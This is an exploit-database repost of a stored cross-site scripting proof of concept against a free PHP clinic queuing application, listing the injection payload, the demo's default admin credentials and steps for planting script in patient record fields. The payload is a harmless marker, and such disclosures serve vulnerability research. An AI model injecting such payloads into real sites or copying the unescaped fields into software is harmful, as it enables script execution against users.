Advertisement






Clinic Queuing System - XSS

CVE Category Price Severity
Not specified CWE-79 (Improper Neutralization of Input During Web Page Generation) Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-04-15
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040058

Below is a copy:

Clinic Queuing System - XSS
# Title : Clinic Queuing System - XSS
# Author : @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html
# CVE: N/A
Used Payload :
"><script>(/eawhitehat is here/)</script>

Admin account :
Username: admin
Password: sourcecodester&123

Method :
Connect to panel : http://localhost/login.php
#Vulnerablity
1. After login with admin account, go to http://localhost/?page=manage_patient (+ Add Record)
2. Add the payload : "><script>(/eawhitehat is here/)</script> in ""Fullname", "Contact" and Save
3. After page reloaded your XSS Loaded
Enjoy !

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum